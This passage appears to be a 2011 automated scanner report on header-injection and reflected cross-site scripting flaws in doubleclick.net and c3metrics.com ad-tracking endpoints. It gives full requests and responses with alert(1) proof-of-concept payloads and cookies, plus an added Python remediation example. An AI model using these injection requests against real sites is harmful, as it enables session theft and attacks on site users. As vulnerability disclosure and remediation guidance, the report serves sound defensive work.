Content-Length: 36
Location: http://static.2mdn.net/1ca5f
5ace8b09f35
/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659:
Date: Thu, 12 May 2011 13:29:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ars.dart/ce_gear

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 777ac%0d%0afed51a7b09 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /777ac%0d%0afed51a7b09/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680;kw=all;kw=cndeage1824;kw=ltmppmg HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/777ac
fed51a7b09
/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680;kw=all;kw=cndeage1824;kw=ltmppmg:
Date: Thu, 12 May 2011 13:28:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)
There are 156 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain: a numeric identifier such as the cid parameter in instance 2.1 should consist of a short run of digits, and input that fails validation should be rejected, not sanitised. Second, user input should be encoded at every point where it is copied into a response, using the encoding that matches the output context. For plain text between tags this means HTML-encoding all metacharacters, including < > " ' and =, with their entity equivalents (&lt; &gt; etc.); for a value written into a JavaScript string literal, as the cid value is in instance 2.1 (c3VJScid='...'), it means JavaScript string escaping that also neutralises < and >, so the HTML parser can never see a closing </script> tag inside the block.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
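The following is an added example, not c3metrics' code or part of the original report. It applies both remediation layers to the cid value that instance 2.1 shows reflected into a JavaScript string literal in a text/html response: an allowlist check on arrival, a vulnerable rendering that mirrors the reflection point, and two context-matched encoders (one for a JavaScript string, one for text between tags). PAYLOAD is the string from the report; the page template and function names are assumptions.

```python
"""Added example, not c3metrics' code: the two remediation layers applied to
the cid value that instance 2.1 shows reflected into a JavaScript string
literal inside a text/html response. The page template and function names
are hypothetical; PAYLOAD is the string from the report."""
import html
import json
import re

PAYLOAD = "3e6c0<script>alert(1)</script>2500faae125"

# Layer 1: validate on arrival. In the report's legitimate request cid is a
# short decimal id (cid=480); anything else is rejected, not sanitised.
_CID = re.compile(r"\A[0-9]{1,10}\Z")


def validate_cid(value: str) -> bool:
    return _CID.fullmatch(value) is not None


def render_vulnerable(cid: str) -> str:
    """Mirrors the reflection point in 2.1: raw interpolation into a
    single-quoted JS string. The response is text/html, so the browser's HTML
    parser sees the injected <script> element before any JavaScript runs."""
    return "<script>var c3VJScid='" + cid + "';</script>"


def js_string_literal(value: str) -> str:
    """Layer 2 for a JavaScript-string context: JSON-encode the value, then
    also escape the characters the HTML parser cares about so no </script>
    or new tag can be formed inside the script block."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_safe_js(cid: str) -> str:
    return "<script>var c3VJScid=" + js_string_literal(cid) + ";</script>"


def render_safe_html_text(cid: str) -> str:
    """Layer 2 for the 'plain text between tags' context named in the issue
    detail: entity-encode < > & " and '."""
    return "<span>" + html.escape(cid, quote=True) + "</span>"


def decodes_back(value: str) -> bool:
    """The JS-string encoding is lossless: a JSON parser (and a JS engine)
    recovers the original value, so legitimate data is not corrupted."""
    return json.loads(js_string_literal(value)) == value


def count_script_tags(rendered: str) -> int:
    """Number of <script> start tags the HTML parser would see; the template
    contributes one (or none), anything more is injected."""
    return len(re.findall(r"<script\b", rendered, re.IGNORECASE))


if __name__ == "__main__":
    print(validate_cid("480"), validate_cid("480" + PAYLOAD))
    print(count_script_tags(render_vulnerable(PAYLOAD)))
    print(render_safe_js(PAYLOAD))
    print(render_safe_html_text(PAYLOAD))
```

Entity-encoding alone would be the wrong tool for the 2.1 reflection point: inside an inline script block the HTML parser does not decode entities, so &lt; would reach the JavaScript engine as a literal ampersand sequence and corrupt the value, while the \u003c form keeps the value intact and still denies the HTML parser a tag.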


2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 3e6c0<script>alert(1)</script>2500faae125 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4803e6c0<script>alert(1)</script>2500faae125&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:32 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-SM=adver_05-12-2011-13-34-32; expires=Sun, 15-May-2011 13:34:32 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-VT=adver_05-12-2011-13-34-32_12907428141305207272; expires=Tue, 10-May-2016 13:34:32 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4803e6c0<script>alert(1)</script>2500faae125-nUID=adver_12907428141305207272; expires=Thu, 12-May-2011 13:49:32 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4803e6c0<script>alert(1)</script>2500faae125';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12907428141305207272';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied unmodified into the response body. The payload 4c8e5<script>alert(1)</script>3b4a9a22f22 was submitted in the id parameter and is echoed, without any encoding, inside the single-quoted JavaScript string assigned to c3VJSnid (see the response below); the same value also reaches the 480-VT and 480-nUID Set-Cookie headers, where it is percent-encoded. Because the response is served as text/html, a browser that opens the URL directly parses the body as HTML and executes the injected <script> element. When the same URL is consumed as a script (which is how v.js loads c3VTabstrct-6-2.php, by creating a script element whose src is this URL), the body is parsed as JavaScript and this payload stays inert inside the string literal; breaking out in that context requires a single quote rather than a tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver4c8e5<script>alert(1)</script>3b4a9a22f22&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:34:29 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver4c8e5%3Cscript%3Ealert%281%29%3C%2Fscript%3E3b4a9a22f22_05-12-2011-13-34-29_14987820991305207269; expires=Tue, 10-May-2016 13:34:29 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver4c8e5%3Cscript%3Ealert%281%29%3C%2Fscript%3E3b4a9a22f22_14987820991305207269; expires=Thu, 12-May-2011 13:49:29 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver4c8e5<script>alert(1)</script>3b4a9a22f22';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='149878209913052
...[SNIP]...

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The scanner classifies this finding as the name of an arbitrarily supplied request parameter; in the request as captured, however, the payload d1300<script>alert(1)</script>f343af93cf0 appears as the value of the uid parameter, prefixed with a slash. The response echoes it unmodified, slash included, inside the single-quoted JavaScript string assigned to c3VJSrvSet, which is the same sink the uid value reaches in 2.6, so this is best read as a duplicate of that finding rather than a separate injection point. The execution contexts are those described in 2.2: the injected <script> element runs when the text/html response is opened directly, while in the script-src context a single quote is needed to leave the literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d1300<script>alert(1)</script>f343af93cf0&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:08 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-08_14282156031305207308; expires=Tue, 10-May-2016 13:35:08 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14282156031305207308; expires=Thu, 12-May-2011 13:50:08 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14282156031305207308';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d1300<script>alert(1)</script>f343af93cf0';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied unmodified into the response body, inside the single-quoted JavaScript string assigned to c3VJSuidSet (the server populates uidSet from rv and rvSet from uid; compare 2.6). The payload def86<script>alert(1)</script>9eee544342d was submitted in the rv parameter and echoed without encoding. The execution contexts are those described in 2.2: the injected <script> element runs when the text/html response is opened directly, while in the script-src context a single quote is needed to leave the literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=def86<script>alert(1)</script>9eee544342d&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-00_12374438441305207300; expires=Tue, 10-May-2016 13:35:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12374438441305207300; expires=Thu, 12-May-2011 13:50:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
72191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12374438441305207300';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='def86<script>alert(1)</script>9eee544342d';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied unmodified into the response body, inside the single-quoted JavaScript string assigned to c3VJStv. The payload f8e87<script>alert(1)</script>c1ec23e9e95 was submitted in the t parameter and echoed without encoding. The execution contexts are those described in 2.2: the injected <script> element runs when the text/html response is opened directly, while in the script-src context a single quote is needed to leave the literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72f8e87<script>alert(1)</script>c1ec23e9e95&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
